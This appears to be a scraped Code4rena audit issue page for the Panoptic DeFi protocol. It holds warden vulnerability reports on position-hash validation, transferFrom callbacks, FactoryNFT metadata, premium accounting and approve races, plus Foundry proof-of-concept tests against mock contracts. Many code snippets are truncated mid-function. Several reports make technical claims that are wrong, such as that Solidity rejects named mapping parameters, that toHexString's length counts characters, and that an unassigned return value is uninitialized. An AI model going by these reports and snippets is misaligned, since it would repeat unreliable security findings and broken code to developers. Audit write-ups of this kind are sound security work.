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2024-06-panoptic-validation's Introduction

Panoptic Audit

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2024-06-panoptic-validation's People


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2024-06-panoptic-validation's Issues

`_validatePositionList()` positionIdList can still lead to forgery

Lines of code

Vulnerability details

Proof of Concept

Take a look at

    function _validatePositionList(
        address account,
        TokenId[] calldata positionIdList,
        uint256 offset
    ) internal view {
        uint256 pLength;
        uint256 currentHash = s_positionsHash[account];

        unchecked {
            pLength = positionIdList.length - offset;

        uint256 fingerprintIncomingList;

        for (uint256 i = 0; i < pLength; ) {
            fingerprintIncomingList = PanopticMath.updatePositionsHash(
            unchecked {

        // revert if fingerprint for provided '_positionIdList' does not match the one stored for the '_account'
        if (fingerprintIncomingList != currentHash) revert Errors.InputListFail();

This function is called from multiple places and is primarily used to validate the legality of positionIdList.

The main logic involves iterating through tokenIds and performing XOR operations, then comparing the result with s_positionsHash[account].

It calls the function

    function updatePositionsHash(
        uint256 existingHash,
        TokenId tokenId,
        bool addFlag
    ) internal pure returns (uint256) {
        // add the XOR`ed hash of the single option position `tokenId` to the `existingHash`
        // @dev 0 ^ x = x

        // update hash by taking the XOR of the new tokenId
        uint256 updatedHash = uint248(existingHash) ^

        // increment the upper 8 bits (position counter) if addflag=true, decrement otherwise
        uint256 newPositionCount = addFlag
            ? uint8(existingHash >> 248) + 1
            : uint8(existingHash >> 248) - 1;

        unchecked {
            return uint256(updatedHash) + (newPositionCount << 248);

Issue as explained by this previous report is that the overflow is ignored, the suggested fix was tol include axcheck that the returned value is less than 255, but thec heck has not been included in the updatePositionsHash() function so the issue has not been fixed, would be key to note that there is a new check that is now present in the PanopticPool's _updatePositionsHash() as seen here, however this function only gets called via the _addUserOption() which is only called when minting options, which would mean that the bug case has been sufficiently fixed for when minting options.

However using this search command:, we can see that there are multiple other core instances where the unprotected PanopticMath.updatePositionsHash() function gets called, which would then mean that this bug case has not been fixed for these other instances.


_validatePositionList() positionIdList can still lead to forgery.

Would be key to note that with the current implementation only during minting has this bug case been mitigated against due to the call to _addUserOption when minting options , however during burning, liquidating, and force exercising options this bug case still exists.

Recommended Mitigation Steps

Apply the suggested fix from the report, which is to include a check in the updatePositionsHash()

Assessed type

Invalid Validation

There is couple of issues with the privius code.

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Vulnerability details


  1. Corrected the syntax for mappings.

  2. Fixed the unchecked block in the _mint function to increment totalSupply first and then update balanceOf[to].

  3. Ensured the increment of totalSupply is within the unchecked block in _mint.

Proof of Concept

1.Mapping Syntax:
//Solidity does not support the mapping syntax used in the code. The correct syntax for mappings should be mapping(address => uint256) instead of mapping(address account => uint256) and mapping(address => mapping(address => uint256)) instead of mapping(address owner => mapping(address spender => uint256)).

  1. Unchecked Block in _mint Function:
    //The unchecked block in _mint is misplaced. The increment of totalSupply should be within the unchecked block since that's the value that might overflow, although totalSupply should be incremented before updating the balanceOf[to].

  2. Total Supply Overflow Check:
    //There is no check to ensure totalSupply doesn't overflow. Although Solidity 0.8.0 and above has built-in overflow checks, the usage of unchecked blocks bypasses these checks. Ensure the increment is handled properly within the unchecked block if necessary.

Tools Used

  1. Opinions from colleagues.
  2. ChatGPT.
  3. Knowledge

Recommended Mitigation Steps

To ensure that your Solidity contract is secure and follows best practices, consider the following mitigation steps:

Correct Mapping Syntax:

Ensure that the mapping syntax adheres to Solidity's standards. Use mapping(address => uint256) for single-level mappings and mapping(address => mapping(address => uint256)) for nested mappings.
Proper Unchecked Block Usage:

Use the unchecked block only where necessary and ensure that critical operations like updating totalSupply and balanceOf are done correctly to prevent overflow or underflow issues.
Implement Overflow/Underflow Checks:

Although Solidity 0.8.x has built-in overflow/underflow checks, ensure that unchecked blocks are used judiciously and only where overflow/underflow is not a concern or is intentionally bypassed for specific reasons.
Balance and Total Supply Management:

Always ensure that the total supply and balances are updated in a consistent manner. Any minting or burning of tokens should be reflected accurately in the totalSupply and individual balanceOf mappings.
Follow Standard ERC-20 Practices:

Adhere to the ERC-20 token standard practices for functions like approve, transfer, and transferFrom. This ensures compatibility with other contracts and tools in the Ethereum ecosystem.
Event Emission:

Ensure that all state-changing operations emit the appropriate events. This provides transparency and traceability for actions performed on the blockchain.
Security Audits:

Regularly perform security audits of the contract. Use tools like MythX, Slither, and Oyente to analyze the contract for potential vulnerabilities.
Consider third-party audits from reputable firms.
Thorough Testing:

Implement comprehensive unit tests for the contract. Use frameworks like Truffle, Hardhat, or Foundry to test all possible scenarios, including edge cases.
Ensure that tests cover not only standard functionality but also potential attack vectors such as reentrancy, overflow, underflow, and other common vulnerabilities.

Assessed type


The issue around validating the position list from the previous audit seems to have not been fixed

Lines of code

Vulnerability details

Proof of Concept

First see the previous issue.

Take a look at

TLDR of the issue is that the _validatePositionList() function is used multiple places and is primarily used to validate the legality of positionIdList. So the main logic involves iterating through tokenIds and performing XOR operations, then comparing the result with s_positionsHash[account], however previously the overflow was ignored, the suggested fix was tol include axcheck that the returned value is less than 255, but the fix implemented as seen below have the check against MAX_POSITIONS which is 32 instead of 255:

    function _updatePositionsHash(address account, TokenId tokenId, bool addFlag) internal {
        // Get the current position hash value (fingerprint of all pre-existing positions created by '_account')
        // Add the current tokenId to the positionsHash as XOR'd
        // since 0 ^ x = x, no problem on first mint
        // Store values back into the user option details with the updated hash (leaves the other parameters unchanged)
        uint256 newHash = PanopticMath.updatePositionsHash(
        if ((newHash >> 248) > MAX_POSITIONS) revert Errors.TooManyPositionsOpen();
        s_positionsHash[account] = newHash;


M-02 has not been correctly mitigated, leaving it vulnerable to the same attacks as hinted in the previous issue and it's duplicates

Recommended Mitigation Steps

Apply the suggested fix from the report, which is †hat the check should be against 255 instead.

Assessed type


Arbitrary from Address Call to transferFrom Function in the PanopticFactory contract

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Vulnerability details


Detailed description of the impact of this finding.




Arbitrary from Address Call to transferFrom Function

The use of an arbitrary from address in the transferFrom calls within the uniswapV3MintCallback function could lead to unauthorised transfer of tokens. This poses a significant security risk as it could allow an attacker to transfer tokens from any address that has approved the contract without the token holder’s consent.

Proof of Concept

Provide direct links to all referenced code in GitHub. Add screenshots, logs, or any other relevant proof that illustrates the concept.

The function uniswapV3MintCallback contains two transferFrom calls that are susceptible to exploitation:

  1. Token0 Transfer:

Located at lines #141-146.

  1. Token1 Transfer:

Located at lines #148-153.

function testUniswapV3MintCallback() public {
        // Arrange
        uint256 amount0Owed = 11;
        uint256 amount1Owed = 101;
        bytes memory data = "0x1e18"; // Mock data

        // Act
        // Assuming the caller has approved the factory contract to spend their tokens
        // Call the uniswapV3MintCallback function with the specified amounts
        panopticFactory.uniswapV3MintCallback(amount0Owed, amount1Owed, data);

        // Assert
        // Check if the tokens were transferred correctly
        assertEq(panopticFactory.balanceOf(address(this)), amount0Owed, "Token0 transfer failed");
        assertEq(panopticFactory.balanceOf(address(this)), amount1Owed, "Token1 transfer failed");

Both instances use decoded.payer as the from address, which can be arbitrarily specified by the caller, leading to potential misuse.

Tools Used

Manual review and Slither.

Recommended Mitigation Steps

Validate from Address:
Ensure that the from address in the transferFrom calls is a trusted and verified address, not arbitrarily supplied by the user.

Use of Access Controls:
Implement role-based access control (RBAC) to restrict who can call sensitive functions like uniswapV3MintCallback. Use modifiers.

Assessed type

Access Control

Incorrect String Truncation in FactoryNFT Can Lead to Incomplete Panoptic Pool Addresses Within Metadata URI

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Vulnerability details


The toHexString function from the LibString library is being used to convert the panopticPool address to a hexadecimal string representation. However, the second argument passed to toHexString is 20, which specifies the desired length of the resulting string. FactoryNFT contract (@contracts\base\FactoryNFT.sol:79)

LibString.toHexString(uint256(uint160(panopticPool)), 20),

The problem is that an Ethereum address is 20 bytes long, which corresponds to 40 hexadecimal characters (each byte is represented by 2 hexadecimal digits). By passing 20 as the second argument, the function is requesting a string of only 20 characters, which is insufficient to represent the full address.

Proof of Concept

A relevant code snippet that illustrates the issue: FactoryNFT contract (@contracts\base\FactoryNFT.sol:58-112)

function constructMetadata(
    address panopticPool,
    string memory symbol0,
    string memory symbol1,
    uint256 fee
) public view returns (string memory) {
    // ...

                                LibString.toHexString(uint256(uint160(panopticPool)), 20), // Incorrect length argument
                                // ...
                            // ...

As shown in the code, the toHexString function is called with 20 as the second argument, which is insufficient to represent the full Ethereum address.

Let's consider an example:

Suppose the panopticPool address is 0x1234567890123456789012345678901234567890. When passed to the toHexString function with a length of 20, the resulting string will be truncated to 0x1234567890123456789, which is only half of the actual address.

This truncated address will be included in the metadata URI, leading to the above mentioned issues. Any external systems or tools relying on the metadata may encounter difficulties in correctly identifying or interacting with the Panoptic Pool based on the incomplete address information.

Tools Used

Vs Code

Recommended Mitigation Steps

Change the second argument to 40 to ensure the entire address is properly represented as a hexadecimal string. By making this change, the toHexString function will return the full 40-character hexadecimal representation of the panopticPool address, avoiding any truncation or loss of information.

LibString.toHexString(uint256(uint160(panopticPool)), 40),

Assessed type


Inaccurate Premium Accounting in SFPM Due to Incomplete Data Updates in registerTokenTransfer.

Lines of code

Vulnerability details


registerTokenTransfer does not update the s_accountPremiumOwed and s_accountPremiumGross mappings when transferring tokens.

When a token is transferred from one address to another, the function correctly updates the s_accountLiquidity and s_accountFeesBase mappings to reflect the transfer of liquidity and fees. However, it does not update the s_accountPremiumOwed and s_accountPremiumGross mappings, which store the premium owed and gross premium for each account.

This means that after a token transfer, the premium-related data will still be associated with the original owner's address instead of being transferred to the new owner. This can lead to incorrect accounting of premiums and potentially affect the calculation of fees and other related functionalities.

The lack of updating the s_accountPremiumOwed and s_accountPremiumGross mappings during token transfers in the registerTokenTransfer function can lead to several issues:

  1. After a token transfer, the premium-related data will still be associated with the original owner's address instead of being transferred to the new owner. This means that the new owner's premium owed and gross premium will not be accurately reflected in the contract's state.

  2. The premium data is used in various fee calculations throughout the contract. If the premium data is not properly transferred to the new owner, it can lead to incorrect fee calculations and distributions.

  3. The registerTokenTransfer function updates the s_accountLiquidity and s_accountFeesBase mappings during token transfers: SemiFungiblePositionManager Contract (@contracts/SemiFungiblePositionManager.sol:642-647)

// update+store liquidity and fee values between accounts
s_accountLiquidity[positionKey_to] = fromLiq;
s_accountLiquidity[positionKey_from] = LeftRightUnsigned.wrap(0);

s_accountFeesBase[positionKey_to] = fromBase;
s_accountFeesBase[positionKey_from] = LeftRightSigned.wrap(0);

However, it does not update the s_accountPremiumOwed and s_accountPremiumGross mappings.

  1. The s_accountPremiumOwed and s_accountPremiumGross mappings are defined in the contract.
mapping(bytes32 => LeftRightSigned) internal s_accountPremiumOwed;
mapping(bytes32 => LeftRightUnsigned) internal s_accountPremiumGross;
  1. The premium data is used in various functions throughout the contract, such as _getPremiaDeltas and _updateStoredPremia:
function _getPremiaDeltas(
    bytes32 positionKey,
    uint256 premium0X64,
    uint256 premium1X64
) internal view returns (uint256 premium0X64_delta, uint256 premium1X64_delta) {
    LeftRightUnsigned memory premiumGross = s_accountPremiumGross[positionKey];
    // ...

function _updateStoredPremia(
    bytes32 positionKey,
    uint256 premium0X64_delta,
    uint256 premium1X64_delta
) internal {
    s_accountPremiumOwed[positionKey] = s_accountPremiumOwed[positionKey].addLeftUnsigned(
    // ...

These functions rely on the accurate premium data stored in the s_accountPremiumOwed and s_accountPremiumGross mappings.

Proof of Concept

Consider the following scenario:

  1. Alice owns a token with ID 1 and has associated premium data stored in the contract.
  2. Alice transfers the token to Bob using the safeTransferFrom function, which internally calls registerTokenTransfer.
  3. After the transfer, the token ownership is updated correctly, and Bob becomes the new owner of the token.
  4. However, the premium data associated with the token remains linked to Alice's address in the s_accountPremiumOwed and s_accountPremiumGross mappings.
  5. If Bob tries to claim the premiums or if the contract performs fee calculations based on the premium data, it will use Alice's premium data instead of Bob's, leading to incorrect results.

This scenario demonstrates how the lack of updating the premium data during token transfers can lead to inconsistencies and potential issues in the contract's functionality.

Tools Used

Vs Code

Recommended Mitigation Steps

The function should also update the s_accountPremiumOwed and s_accountPremiumGross mappings during the token transfer process, similar to how it updates the liquidity and fees mappings. The premium data should be transferred from the sender's address to the recipient's address to ensure accurate tracking of premiums for each account.

Assessed type


the issue type ragarding expect return value for approve, transfer and we adding transfer from.

Lines of code

Vulnerability details


  1. Standards Compliance:

  2. Interface Incompatibility:

  3. Security Considerations:

Proof of Concept

  1. The interface does not fully comply with the ERC20 standard, which expects certain functions to return a boolean value. This could lead to compatibility issues with tools, libraries, or contracts that strictly adhere to the ERC20 standard.

  2. Contracts or services interacting with IERC20Partial expecting ERC20 functions with return values might face errors or unexpected behavior.

  3. By not adhering to the ERC20 standard, there could be security implications, especially in contexts where the return value of approve, transfer, and transferFrom is critical for ensuring successful operations and preventing erroneous transfers or approvals.




  7. Below the transfer we adding transferfrom.

function transferFrom(address from, address to, uint256 amount) external returns (bool);

Discord, ChatGPT3.5, Discussions on Github.

Recommended Mitigation Steps

  1. Complying with ERC20: Including the return values ensures that the interface is fully compliant with the ERC20 standard.

  2. Maintaining Compatibility: The interface remains compatible with tools, libraries, and contracts expecting the standard ERC20 interface.

  3. Reducing Errors: Properly implementing the standard reduces the risk of errors or unexpected behavior in interactions with other contracts or services.

Assessed type


[M-01] Potential Division by Zero or Unintended Behavior Due to Close Asset Values in the `revoke` function

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Vulnerability details

Vulnerability Details

The revoke function in the smart contract has a medium severity issue related to the calculation of shares when revoking delegated shares. The issue arises from the calculation involving the potential division by zero or unintended behavior when the totalAssets() value is very close to or equal to the assets value being processed. Specifically, the problematic calculation is:

Math.mulDiv(assets, totalSupply - delegateeBalance, uint256(Math.max(1, int256(totalAssets()) - int256(assets))))

If totalAssets() is close to or equal to assets, the calculation could lead to an unintended division by a very small number, potentially resulting in a large and incorrect number of shares being minted or causing the transaction to revert.


The impact of this vulnerability includes:

  • Unexpected Reverts: The transaction may unexpectedly revert due to a division by zero or near-zero value.
  • Incorrect Share Calculation: If the calculation results in a large number due to a small denominator, it could lead to an incorrect number of shares being minted, potentially affecting the balance and integrity of the contract's operations.
  • Collateral Mismanagement: This issue could lead to improper management of collateral, which could compromise the security and reliability of the financial operations of the smart contract.

Proof of Concept

Here is the original function with the potential vulnerability:

function revoke(
    address delegator,
    address delegatee,
    uint256 assets
) external onlyPanopticPool {
    uint256 shares = convertToShares(assets);

    // Get the delegatee balance and compare it later against the requested amount
    uint256 delegateeBalance = balanceOf[delegatee];

    if (shares > delegateeBalance) {
        // Transfer delegatee balance to delegator
        _transferFrom(delegatee, delegator, delegateeBalance);

        // Calculate the remaining shares to mint
        uint256 remainingShares = Math.mulDiv(
            totalSupply - delegateeBalance,
            uint256(Math.max(1, int256(totalAssets()) - int256(assets)))

        // Subtract delegatee balance from remaining shares since it was already transferred
        _mint(delegator, remainingShares - delegateeBalance);
    } else {
        // Transfer shares back if requested amount is less than delegatee balance
        _transferFrom(delegatee, delegator, shares);

Tools Used

  • Manual Review

Recommended Mitigation Steps

To mitigate the issue, ensure that the calculation handles edge cases properly and avoids division by zero or unintended behavior. Here is the revised function:

function revoke(
    address delegator,
    address delegatee,
    uint256 assets
) external onlyPanopticPool {
    uint256 shares = convertToShares(assets);

    // Get the delegatee balance and compare it later against the requested amount
    uint256 delegateeBalance = balanceOf[delegatee];

    // Check for the total supply and delegatee balance edge case
    require(totalSupply > delegateeBalance, "Total supply must be greater than delegatee balance");

    // Check for total assets and assets edge case
    require(totalAssets() > assets, "Total assets must be greater than assets");

    if (shares > delegateeBalance) {
        // Transfer delegatee balance to delegator
        _transferFrom(delegatee, delegator, delegateeBalance);

        // Calculate the remaining shares to mint
        uint256 remainingShares = Math.mulDiv(
            totalSupply - delegateeBalance,
            uint256(Math.max(1, int256(totalAssets()) - int256(assets)))

        // Subtract delegatee balance from remaining shares since it was already transferred
        _mint(delegator, remainingShares - delegateeBalance);
    } else {
        // Transfer shares back if requested amount is less than delegatee balance
        _transferFrom(delegatee, delegator, shares);

Assessed type


Delegatecal Loop : contracts/base/Multicall.sol#L12-L36

Lines of code

Vulnerability details


An attacker could exploit the delegatecall-loop vulnerability by crafting malicious data that causes unexpected behavior when the delegatecall is executed inside a loop in a payable function. This could potentially result in unauthorized access to sensitive data, manipulation of contract state, or loss of funds. By repeatedly calling delegatecall within the loop, an attacker could potentially bypass security checks or manipulate the flow of execution in a way that benefits them. This vulnerability poses a high risk as it could lead to severe consequences if exploited by a malicious actor.

Proof of Concept

Position :

Code :

function multicall(bytes[] calldata data) public payable returns (bytes[] memory results) {
    results = new bytes[](data.length);
    for (uint256 i = 0; i &lt; data.length; ) {
        (bool success, bytes memory result) = address(this).delegatecall(data[i]);

        if (!success) {
            // Bubble up the revert reason
            // The bytes type is ABI encoded as a length-prefixed byte array
            // So we simply need to add 32 to the pointer to get the start of the data
            // And then revert with the size loaded from the first 32 bytes
            // Other solutions will do work to differentiate the revert reasons and provide paranthetical information
            // However, we have chosen to simply replicate the the normal behavior of the call
            // NOTE: memory-safe because it reads from memory already allocated by solidity (the bytes memory result)
            assembly ("memory-safe") {
                revert(add(result, 32), mload(result))

        results[i] = result;

        unchecked {

Tools Used


Recommended Mitigation Steps

The vulnerability in the provided code snippet is the presence of a delegatecall inside a loop in a payable function. This can lead to potential reentrancy attacks, where an attacker can repeatedly call the multicall function and potentially drain the contract's Ether balance.

To rectify this vulnerability, you should ensure that the function being called by delegatecall is not payable and does not use msg.value. Here's a recommended approach:

  1. Create a modifier , for instance onlyOwner, that restricts access to certain functions to only authorized users ( ie : the contract owner).

address public owner;

constructor() {
    owner = msg.sender; // Setting the contract deployer as the owner

modifier onlyOwner() {
    require(msg.sender == owner, "Caller is not the owner");
  1. Make the multicall function non-payable and restrict its access to only the contract owner using the onlyOwner modifier.

function multicall(bytes[] calldata data) public onlyOwner returns (bytes[] memory results) {
    // ... (existing code)

  1. Ensure that the functions being called by delegatecall are not payable and do not use msg.value. If they need to handle Ether transfers, implement separate functions that can be called directly by the contract owner.

By following these steps, you can mitigate the risk of reentrancy attacks and ensure that the multicall function is used securely within the intended scope of the contract's functionality.

Assessed type


`FactoryNFT#tokenURI()` does not comply with 721 since it doedne check if the tokenId is valid

Lines of code

Vulnerability details

Proof of Concept

Take a look at

    function tokenURI(uint256 tokenId) public view override returns (string memory) {
        address panopticPool = address(uint160(tokenId));


According to the EIP, the tokenURI is expected to revert/throw in the case where the tokenId is not a valid one, see

/// @notice A distinct Uniform Resource Identifier (URI) for a given asset.
    /// @dev Throws if `_tokenId` is not a valid NFT. URIs are defined in RFC
    ///  3986. The URI may point to a JSON file that conforms to the "ERC721
    ///  Metadata JSON Schema".
    function tokenURI(uint256 _tokenId) external view returns (string);


Borderline low, medium, no QA so attaching as med.

Recommended Mitigation Steps

Consider ensuring that the tokenId is valid so as to conform with the EIP.

Assessed type


safeERC20Symbol() function will always revert when interating with tokens that returns bytes32 as Symbol

Lines of code

Vulnerability details


Tokens that return bytes32 as a Symbol are incompatible with the FactoryNFT.

Proof of Concept

Some tokens (e.g. MKR) have metadata fields (name / symbol) encoded as bytes32 instead of a string. Such tokens will cause that all calls to PanopticMath.safeERC20Symbol() ends up reverting the whole tx.

function safeERC20Symbol(address token) external view returns (string memory) {

    //@audit-issue => Any token that returns bytes32 will cause the tx to revert!

    // not guaranteed that token supports metadata extension
    // so we need to let call fail and return placeholder if not
    try IERC20Metadata(token).symbol() returns (string memory symbol) {
        return symbol;
    } catch {
        return "???";

Coded PoC

Expand to see PoC

Add the below file under the folder test/foundry.

// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.0;

// Foundry
import "forge-std/Test.sol";

import {PanopticMath} from "@libraries/PanopticMath.sol";
import {FactoryNFT} from "../../contracts/base/FactoryNFT.sol";

import {Pointer} from "@types/Pointer.sol";

import {IUniswapV3Pool} from "v3-core/interfaces/IUniswapV3Pool.sol";

//@audit => Short implementation of the Maker Token
//@audit =>
contract DSToken {
    bytes32 public symbol;

    constructor(bytes32 symbol_) public {
        symbol = symbol_;

contract TetherToken {
    string public symbol;
    constructor(string memory symbol_) public {
        symbol = symbol_;


contract UniPool {
  address public token0;
  address public token1;

  constructor(address _token0, address _token1) {
    token0 = _token0;
    token1 = _token1;

contract PanopticPool {
  IUniswapV3Pool pool;

  constructor(address _uniPool) {
    pool = IUniswapV3Pool(_uniPool);

contract FactoryNFTMock is FactoryNFT {
      bytes32[] memory properties,
      uint256[][] memory indices,
      Pointer[][] memory pointers
      FactoryNFT(properties, indices, pointers){}
    function callsafeERC20Symbol(address token) external view returns (string memory) {

contract SafeERC20SymbolTest is Test {
    bytes32[] properties;
    uint256[][] indices;
    Pointer[][] pointers;

    function test_safeERC20Symbol() external {
      DSToken makerToken = new DSToken(bytes32(0x4d4b520000000000000000000000000000000000000000000000000000000000));
      TetherToken usdtToken = new TetherToken(string("USDT"));
      UniPool uniPool = new UniPool(address(makerToken), address(usdtToken));

      PanopticPool panopticPool = new PanopticPool(address(uniPool));

      FactoryNFTMock factoryNFT = new FactoryNFTMock(properties, indices, pointers);

      //@audit-info => All fine when symbol returns a string!
      string memory usdtSymbol = factoryNFT.callsafeERC20Symbol(address(usdtToken));

      //@audit => Execution reverts when symbol returns bytes32
      string memory makerSymbol = factoryNFT.callsafeERC20Symbol(address(makerToken));

      address panopticPoolAddress = address(panopticPool);
      uint256 tokenId = uint256(uint160(panopticPoolAddress));

      //@audit => Execution reverts when symbol returns bytes32
      string memory tokenURI = factoryNFT.tokenURI(tokenId);


Run the PoC with the command forge test --match-test test_safeERC20Symbol -vvvv and analize the output, as expected, the two calls to the MKR mock token, (returns bytes32) causes the tx to revert

    │   ├─ [2702] PanopticMath::safeERC20Symbol(TetherToken: [0x2a9e8fa175F45b235efDdD97d2727741EF4Eee63]) [delegatecall]
    │   │   ├─ [1147] TetherToken::symbol() [staticcall]
    │   │   │   └─ ← [Return] "USDT"
    │   │   └─ ← [Return] "USDT"
    │   └─ ← [Return] ""
    //@audit-issue => First call to the MKR mock token
    ├─ [0] VM::expectRevert(custom error f4844814:)
    │   └─ ← [Return]
    ├─ [1660] FactoryNFTMock::callsafeERC20Symbol(DSToken: [0xFEfC6BAF87cF3684058D62Da40Ff3A795946Ab06]) [staticcall]
    │   ├─ [1014] PanopticMath::safeERC20Symbol(DSToken: [0xFEfC6BAF87cF3684058D62Da40Ff3A795946Ab06]) [delegatecall]
    │   │   ├─ [261] DSToken::symbol() [staticcall]
    │   │   │   └─ ← [Return] ""
    │   │   └─ ← [Revert] EvmError: Revert
    │   └─ ← [Revert] EvmError: Revert

    //@audit-issue => Second call to the MKR mock token
    ├─ [0] VM::expectRevert(custom error f4844814:)
    │   └─ ← [Return]
    ├─ [753] FactoryNFTMock::tokenURI(47508985303868808400900336068535627141182218264 [4.75e46]) [staticcall]
    │   ├─ [24] PanopticPool::univ3pool() [staticcall]
    │   │   └─ ← [Revert] EvmError: Revert
    │   └─ ← [Revert] EvmError: Revert
    └─ ← [Stop]

Tools Used

Manual Audit

Recommended Mitigation Steps

Make a low-level call to retrieve the symbol and then convert it to string.

Assessed type


Uninitialized Variable in _getRequiredCollateralSingleLegPartner Function May Lead to Incorrect Collateral Calculations

Lines of code

Vulnerability details


The _getRequiredCollateralSingleLegPartner function in the CollateralTracker contract has a logic path where the required variable may remain unassigned. Specifically, if isLong != tokenId.isLong(partnerIndex) is true and isLong == 0, the function does not assign a value to required. This can lead to uninitialized variables being used, causing unexpected behavior or vulnerabilities in the contract. Uninitialized variables can result in incorrect collateral calculations, potentially affecting the security and stability of the entire collateral management system.

Proof of Concept

Line of Code:

if (isLong != tokenId.isLong(partnerIndex)) {
    if (isLong == 1) {
        required = _computeSpread(
} else {
    required = _computeStrangle(tokenId, index, positionSize, atTick, poolUtilization);


Here's a scenario illustrating the issue:

  1. isLong is 0.
  2. tokenId.isLong(partnerIndex) is 1.
  3. The condition if (isLong != tokenId.isLong(partnerIndex)) is true.
  4. Since isLong == 0, the inner if (isLong == 1) is false, leading to no assignment for required.

This results in required being uninitialized, which can cause erroneous behavior when this variable is later used.

Tools Used


Recommended Mitigation Steps

Ensure that all code paths in _getRequiredCollateralSingleLegPartner assign a value to the required variable.

function _getRequiredCollateralSingleLegPartner(
    TokenId tokenId,
    uint256 index,
    uint128 positionSize,
    int24 atTick,
    uint128 poolUtilization
) internal view returns (uint256 required) {
    uint256 partnerIndex = tokenId.riskPartner(index);
    uint256 isLong = tokenId.isLong(index);

    if (isLong != tokenId.isLong(partnerIndex)) {
        if (isLong == 1) {
            required = _computeSpread(
        } else {
            // Handle the case where isLong == 0
            required = _computeSpread(
    } else {
        required = _computeStrangle(tokenId, index, positionSize, atTick, poolUtilization);

This ensures that the required variable is always assigned a value, preventing uninitialized variables from causing issues in the contract.

Assessed type


Agreements & Disclosures


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To signal your agreement to these terms, add a 👍 emoji to this issue.

Code4rena staff reserves the right to disqualify anyone from this role and similar future opportunities who is unable to participate within the above guidelines.


Sponsors may elect to add team members and contractors to assist in sponsor review and triage. All sponsor representatives added to the repo should comment on this issue to identify themselves.

To ensure contest integrity, the following potential conflicts of interest should also be disclosed with a comment in this issue:

  1. any sponsor staff or sponsor contractors who are also participating as wardens
  2. any wardens hired to assist with sponsor review (and thus presenting sponsor viewpoint on findings)
  3. any wardens who have a relationship with a judge that would typically fall in the category of potential conflict of interest (family, employer, business partner, etc)
  4. any other case where someone might reasonably infer a possible conflict of interest.

Approve race condition in Collateral Tracker

Lines of code

Vulnerability details


The function approve(address spender, uint256 amount) allows spender to withdraw from your account, multiple times, up to the amount. If this function is called again it overwrites the current allowance with the new amount.

Front running this approval can cause a owner to approve a different amount of shares than the one they intended to approve.

Proof of Concept

Attack scenario:

  1. Alice allows Bob to transfer N of Alice's tokens (N>0) by calling the approve method on a Token smart contract, passing the Bob's address and N as the method arguments
  2. After some time, Alice decides to change from N to M (M>0) the number of Alice's tokens Bob is allowed to transfer, so she calls the approve method again, this time passing the Bob's address and M as the method arguments
  3. Bob notices the Alice's second transaction before it was mined and quickly sends another transaction that calls the transferFrom method to transfer N Alice's tokens somewhere
  4. If the Bob's transaction will be executed before the Alice's transaction, then Bob will successfully transfer N Alice's tokens and will gain an ability to transfer another M tokens
  5. Before Alice noticed that something went wrong, Bob calls the transferFrom method again, this time to transfer M Alice's tokens.
  6. So, an Alice's attempt to change the Bob's allowance from N to M (N>0 and M>0) made it possible for Bob to transfer N+M of Alice's tokens, while Alice never wanted to allow so many of her tokens to be transferred by Bob.

Proof Of Concept

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.18;

import {Test, console} from "forge-std/Test.sol";
import {FactoryNFT} from "@base/FactoryNFT.sol";
import {CollateralTrackerTest} from "./core/CollateralTracker.t.sol";
import {CollateralTracker} from "@contracts/CollateralTracker.sol";
import {IERC20Partial} from "@tokens/interfaces/IERC20Partial.sol";
import {ERC20Mock} from "@openzeppelin/contracts/mocks/ERC20Mock.sol";
import {PanopticFactoryTest} from "./core/PanopticFactory.t.sol";
import {PanopticPool} from "@contracts/PanopticPool.sol";
import {PanopticPoolTest} from "./core/PanopticPool.t.sol";

contract BugTest_CollateralTracker is CollateralTrackerTest {
    FactoryNFT public factory;
    ERC20Mock public mock;
    address public mockAddr;
    address public ctAddr;
    CollateralTracker public ct;

    function setUp() public override(CollateralTrackerTest) {
        mock = new ERC20Mock("Mock", "MCK", address(this), 1e18);
        ct = new CollateralTracker(10, 2_000, 1_000, -1_024, 5_000, 9_000, 20_000);
        mock.approveInternal(address(this), address(ct), type(uint256).max);
        mockAddr = address(mock);
        ctAddr = address(ct);

    function test_ApproveRaceCondition() public {
        address owner = makeAddr("owner");
        ct.startToken(false, token0, mockAddr, fee, panopticPool);, 100e18);

        // lets say owner deposits and approves the contract
        mock.approveInternal(owner, address(ct), type(uint256).max);, owner);

        // Owner approves Alice to transfer 50 shares
        ct.approve(Alice, 50);

        // Now the owner going to increase the allowance of Alice to 100
        // But, Alice front runs the approval
        ct.transferFrom(owner, Alice, 50);

        ct.approve(Alice, 100);

        // Now Alice can transfer 100 shares
        console.log("The Total Allowance for Alice is :", ct.allowance(owner, Alice));
        ct.transferFrom(owner, Alice, 100);

        console.log("Total balance of Alice is :", IERC20Partial(ctAddr).balanceOf(Alice));
        // Thus Alice can transfer 150 shares instead of 100 shares which is not intended by the owner
        assertEq(IERC20Partial(ctAddr).balanceOf(Alice), 150);

Test Logs

  The Total Allowance for Alice is : 100
  Total balance of Alice is : 150

Tools Used

Manual Analysis

Recommended Mitigation Steps

It is recommended to use the increaseAllowance method instead of the approve method for increasing the allowance of a spender.

Use the openzeppelin's increaseAllowance and decreaseAllowance method to increase or decrease the allowance of a spender.

Here is the recommended mitigation:

+ function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
+         address owner = _msgSender();
+         _approve(owner, spender, allowance(owner, spender) + addedValue);
+         return true;
+    }

Assessed type


Integer Overflow in Metadata Access Logic ([bytes32("descriptions")])

Lines of code

Vulnerability details


FactoryNFT contract (@contracts\base\FactoryNFT.sol:139-147)

svgOut = svgOut
        "<!-- TEXT -->",
        metadata[bytes32("descriptions")][lastCharVal + 16 * (rarity / 8)]
    .replace("<!-- ART -->", metadata[bytes32("art")][lastCharVal].decompressedDataStr())
    .replace("<!-- FILTER -->", metadata[bytes32("filters")][rarity].decompressedDataStr());

The problem is with the index calculation lastCharVal + 16 * (rarity / 8) when accessing the metadata[bytes32("descriptions")] array.

If the value of lastCharVal is large enough, it could cause an integer overflow when added to 16 * (rarity / 8). This could lead to even out-of-bounds access to the metadata[bytes32("descriptions")] array.

Proof of Concept

If the value of lastCharVal is large enough, the index calculation lastCharVal + 16 * (rarity / 8) can result in an integer overflow. This means that the calculated index could wrap around and become a smaller value than intended. As a result, the contract might access an element outside the valid range of the metadata[bytes32("descriptions")] array.

For example, let's say the metadata[bytes32("descriptions")] array has a length of 100. If lastCharVal is 2^256 - 20 (a very large value) and rarity is 24, the calculated index would be.

index = (2^256 - 20) + 16 * (24 / 8)
      = (2^256 - 20) + 48
      = 28 (due to integer overflow)

